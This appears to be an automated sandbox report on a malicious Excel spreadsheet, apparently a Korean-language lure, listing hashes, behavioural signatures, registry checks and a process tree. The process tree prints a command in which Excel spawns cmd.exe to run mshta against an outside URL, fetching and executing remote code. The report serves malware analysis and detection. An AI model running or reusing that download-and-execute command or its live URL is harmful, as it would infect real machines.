Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:17
Behavioral task
behavioral1
Sample
(20220120)2022 - 001.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
(20220120)2022 - 001.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).chm
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
Resource
win10v2004-20230220-en
General
-
Target
(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
-
Size
135KB
-
MD5
c8df23e698e196f803ace0f50a18944d
-
SHA1
bf47a34bc092fa81918a387e8f5282f7a7d8a0c4
-
SHA256
db70f269d62c43bd09580858731853a589e0f32f2d3c915b15cb9f0b4b9f12d2
-
SHA512
29146eff3ed7d8b6ddbf1736f2e2a2fb90a0cec1fc9f8244763802ef9af36bbf1fdd907eee198fe8d910cd3ae17227ab2d2b9e376d9243bdc549d602182f6ab3
-
SSDEEP
3072:Fk3hOdsylKlgryzc4bNhZFGzE+cL2knAeQN3QgBzMnNXHM6au7Fei9Yyg4/FQbux:Fk3hOdsylKlgryzc4bNhZF+E+W2knAeX
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/6.html
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exeWerFault.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2816 1116 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2108 1116 WerFault.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 30 4616 mshta.exe -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes:
DW20.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1020 1116 DW20.EXE EXCEL.EXE -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2108 1116 WerFault.exe EXCEL.EXE -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dwwin.exeEXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dwwin.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
EXCEL.EXEdwwin.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwwin.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1116 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
EXCEL.EXEpid process 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1116 EXCEL.EXE 1116 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE 1116 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exeDW20.EXEdescription pid process target process PID 1116 wrote to memory of 2816 1116 EXCEL.EXE cmd.exe PID 1116 wrote to memory of 2816 1116 EXCEL.EXE cmd.exe PID 2816 wrote to memory of 4616 2816 cmd.exe mshta.exe PID 2816 wrote to memory of 4616 2816 cmd.exe mshta.exe PID 1116 wrote to memory of 1020 1116 EXCEL.EXE DW20.EXE PID 1116 wrote to memory of 1020 1116 EXCEL.EXE DW20.EXE PID 1020 wrote to memory of 3240 1020 DW20.EXE dwwin.exe PID 1020 wrote to memory of 3240 1020 DW20.EXE dwwin.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/6.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://attiferstudio.com/install.bak/sony/6.html3⤵
- Blocklisted process makes network request
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 44442⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwwin.exeC:\Windows\system32\dwwin.exe -x -s 44443⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1116 -s 45682⤵
- Process spawned unexpected child process
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 1116 -ip 11161⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1020-165-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1020-166-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1020-167-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1020-168-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1116-133-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1116-135-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1116-134-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1116-136-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1116-137-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmpFilesize
64KB
-
memory/1116-138-0x00007FF88EC90000-0x00007FF88ECA0000-memory.dmpFilesize
64KB
-
memory/1116-139-0x00007FF88EC90000-0x00007FF88ECA0000-memory.dmpFilesize
64KB